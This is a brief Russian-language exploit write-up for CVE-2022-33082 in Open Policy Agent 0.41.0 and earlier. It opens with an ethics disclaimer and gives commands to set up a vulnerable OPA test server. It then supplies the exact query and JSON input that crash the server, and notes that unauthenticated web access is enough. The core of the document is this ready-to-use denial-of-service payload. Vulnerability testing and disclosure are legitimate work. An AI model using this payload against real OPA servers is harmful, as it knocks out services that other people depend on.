CVE 2022-33082 Эксплойт
ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ
Этот код предоставлен для ЭТИЧЕСКИХ целей — понимания уязвимости и тестирования собственных систем или АВТОРИЗОВАННЫХ систем. Используя его, вы соглашаетесь действовать этично, и я не несу ответственности, если вы действуете неэтично.
Этот эксплойт работает на версиях Open Policy Agent (OPA) 0.41.0 и ниже. Установите экземпляр OPA на Linux для тестирования с помощью этой команды:
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
Затем перейдите на localhost:8181 в вашем веб-браузере. Введите приведённое ниже в соответствующие поля
поле запроса (код Go):
p := [input() | input := 1]
{ "input":"put this in the input (json) field!" }
После этого веб-сайт аварийно завершит работу, а терминал, запускающий сервер, сообщит о панике ядра
Последствия
Любой, у кого есть веб-доступ к серверу OPA версии 0.41.0 или ниже, может полностью вывести сервер из строя. Этот сервер по умолчанию не защищён паролем.